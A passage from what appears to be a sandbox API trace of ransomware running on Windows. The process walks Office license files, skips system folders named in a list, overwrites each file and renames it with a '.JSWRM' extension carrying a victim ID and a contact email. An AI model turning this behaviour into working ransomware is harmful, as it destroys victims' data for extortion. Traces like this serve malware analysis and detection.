files\\microsoft office\\root\\licenses16\\excelr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.772] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19919) returned 1 [0102.772] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dc0) returned 0x24c1d0 [0102.772] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dc0, lpOverlapped=0x0) returned 1 [0102.776] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.776] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dc0, lpOverlapped=0x0) returned 1 [0102.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.776] CloseHandle (hObject=0x45c) returned 1 [0102.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0102.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0102.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0102.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0102.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0102.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0102.778] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe330c311, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe330c311, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec691f40, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Trial-pl.xrm-ms", cAlternateFileName="EXA577~1.XRM")) returned 1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.778] lstrcmpiW (lpString1="ExcelR_Trial-pl.xrm-ms", lpString2="msocache") returned -1 [0102.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0102.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0102.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0102.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0102.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0102.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.779] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11139) returned 1 [0102.779] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0102.779] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0102.784] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.784] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0102.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.784] CloseHandle (hObject=0x45c) returned 1 [0102.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0102.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0102.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0102.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.785] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.786] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3299b47, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3299b47, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe330c311, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51e7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Trial-ppd.xrm-ms", cAlternateFileName="EX4CA4~1.XRM")) returned 1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.786] lstrcmpiW (lpString1="ExcelR_Trial-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2413a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0102.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.787] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20967) returned 1 [0102.787] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51e0) returned 0x24c1d0 [0102.787] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51e0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51e0, lpOverlapped=0x0) returned 1 [0102.791] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.791] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51e0, lpOverlapped=0x0) returned 1 [0102.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.791] CloseHandle (hObject=0x45c) returned 1 [0102.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0102.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0102.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0102.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0102.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0102.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0102.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.796] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe337e9fc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe337e9fc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34d5ed4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Trial-ul-oob.xrm-ms", cAlternateFileName="EXB3BA~1.XRM")) returned 1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.796] lstrcmpiW (lpString1="ExcelR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0102.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241308, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0102.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241060, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0102.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 